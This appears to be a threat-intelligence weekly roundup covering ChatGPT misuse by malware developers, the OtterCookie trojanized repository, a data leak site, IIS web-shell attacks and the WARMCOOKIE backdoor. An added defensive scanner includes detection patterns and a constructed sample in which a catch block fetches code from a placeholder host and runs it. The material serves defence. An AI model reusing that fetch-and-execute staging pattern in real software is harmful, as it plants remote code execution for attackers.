
Tags: Threat intelligence

10 October 2025

Weekly Summary Cyberattacks October 02-08

OpenAI Disrupts Multiple Clusters Misusing ChatGPT to Accelerate Cybercrime and Influence Operations

OpenAI published its latest threat intelligence report, revealing that multiple state-linked and criminal actors have used ChatGPT to enhance their cyber operations, scams, and influence campaigns. Since 2024, OpenAI has disrupted over forty networks that violated its usage policies, finding that adversaries increasingly integrate AI into existing workflows to streamline phishing, malware development, and propaganda, rather than to create new attack methods. One such cluster involved Russian-language criminal operators who used ChatGPT to aid in the development of remote-access trojans and credential-stealing modules. These accounts, active on Telegram and affiliated with Russian-speaking underground forums, used the model to troubleshoot and refine components for post-exploitation, shellcode conversion, and browser credential parsing. The actors leveraged multiple ChatGPT accounts to generate and debug building-block code for in-memory loaders, clipboard hijacking, and Telegram-based exfiltration, treating the model as a technical assistant rather than a malware generator. OpenAI emphasized that its models consistently refused explicitly malicious requests and that no new offensive capabilities emerged beyond what is already publicly available.

Malicious Node Package Deploys OtterCookie

A new campaign was detected in which a trojanized open-source project hosted on Bitbucket delivered OtterCookie, a North Korea-linked stealer/backdoor family, to developer workstations and financial-sector targets. The malicious repository posed as a benign 3D chess project but contained an initialization routine deliberately engineered to fail; when that failure path executed, a catch block reached out to a remote API and downloaded attacker-supplied JavaScript, which was compiled and executed in-process. That remote-stage design allowed a mostly benign repository to act as a stealthy staging channel: the code visible in the repository looked normal, while the remote response performed the malicious actions.
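The staging pattern described above (a catch block that fetches remote content and executes it in-process) is something a code reviewer or pre-install scanner can look for. The following is an added example, not code from the report or from the campaign: a small heuristic scanner that extracts every catch block from a JavaScript source string and flags those that combine a network call with dynamic code execution. The two sample sources are constructed for illustration, and the brace matching deliberately ignores braces inside string literals, which is a simplification.

```javascript
'use strict';

// Calls that fetch remote content from inside a catch block.
const NETWORK_RE = /\b(fetch|axios|request|got|https?\.(get|request))\s*\(/;
// Calls that compile or execute code at runtime (the "remote stage" sink).
const DYNAMIC_EXEC_RE =
  /\b(eval|new\s+Function|vm\.(runInThisContext|runInNewContext|runInContext|Script|compileFunction))\s*\(/;

// Return { offset, body } for every catch block in the source, found by matching braces.
// Simplification: braces inside string literals are not skipped.
function extractCatchBodies(src) {
  const bodies = [];
  const re = /\bcatch\b\s*(\([^)]*\))?\s*\{/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    const start = re.lastIndex; // first character after the opening brace
    let depth = 1;
    let i = start;
    while (i < src.length && depth > 0) {
      if (src[i] === '{') depth++;
      else if (src[i] === '}') depth--;
      i++;
    }
    bodies.push({ offset: m.index, body: src.slice(start, i - 1) });
  }
  return bodies;
}

// Flag catch blocks that both reach the network and execute what they receive.
function scanForStagingCatch(src) {
  return extractCatchBodies(src).filter(
    ({ body }) => NETWORK_RE.test(body) && DYNAMIC_EXEC_RE.test(body)
  );
}

// Constructed sample: an init routine whose failure path downloads and runs code.
const SUSPICIOUS_SAMPLE = `
function initBoard(board) {
  try {
    return board.pieces.map((p) => p.square); // throws: board is undefined
  } catch (e) {
    fetch("https://api.example.invalid/stage").then((r) => r.text()).then((code) => {
      new Function(code)();
    });
  }
}`;

// Constructed sample: an ordinary catch block that only logs the error.
const BENIGN_SAMPLE = `
function loadConfig(path) {
  try {
    return JSON.parse(fs.readFileSync(path, "utf8"));
  } catch (e) {
    console.error("failed to load", path, e.message);
    return null;
  }
}`;
```

Running `scanForStagingCatch` over a package's source files before installation gives a cheap triage signal; a hit warrants manual review rather than automatic blocking, since legitimate plugin loaders can match the same shape.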

ShinyHunters Launches Data Leak Site: Trinity of Chaos Announces New Ransomware Victims

A new data leak site called "Trinity of Chaos" has been launched by a cybercrime collective associated with ShinyHunters, LAPSUS$, and Scattered Spider. The site lists 39 organizations as victims. The adversaries are reported to have exploited weak configurations and misused OAuth authorization flows and their integrations, possibly using voice phishing to trick employees into granting malicious OAuth apps access to critical CRM infrastructure. Once they secured access, the attackers exported large volumes of personally identifiable information (PII) and other sensitive data. The combination of data exfiltration with the threat of encryption or further public exposure underscores that these attacks are now a hybrid of the data breach and ransomware models.

UAT-8099: Chinese-Speaking Cybercrime Group Targets High-Value IIS for SEO Fraud

A Chinese-speaking cybercrime group, designated UAT-8099, has been identified as the operator behind a sophisticated campaign targeting high-value IIS web servers across multiple countries. The group's primary objectives are SEO fraud and credential theft, and its victims include universities, telecom providers, and technology companies in regions such as India, Thailand, Vietnam, Canada, and Brazil. UAT-8099 gains initial access by exploiting insecure file upload configurations on IIS servers to deploy web shells. Once inside, the group activates guest accounts and escalates their privileges to administrator level, enabling Remote Desktop Protocol (RDP) connections. By compromising trusted server infrastructure, UAT-8099 undermines search engine integrity, exposing both users and organizations to ongoing risk.

WARMCOOKIE One Year Later: New Features and Fresh Insights

New findings have been published on WARMCOOKIE, a Windows backdoor observed in enterprise-targeted intrusions. The report tracks how the backdoor has continued to evolve over the past year: operators maintain active infrastructure and have iterated on code protections, while the core purpose remains unchanged, namely establishing a quiet foothold on endpoints and then gaining hands-on control for post-compromise activity. WARMCOOKIE's execution chain leads to a resident backdoor that communicates with its command-and-control server over HTTP(S), exchanging encrypted tasking and results. Once active, it supports the backdoor functionality commonly used during the early stages of an intrusion, including host reconnaissance and fingerprinting, remote command execution, file operations (read/write/upload), and surveillance features such as screen capture. Samples are characterized by strong obfuscation and anti-analysis measures designed to frustrate static inspection and sandboxing, as well as by runtime behaviors that minimize artifacts on disk to complicate forensics.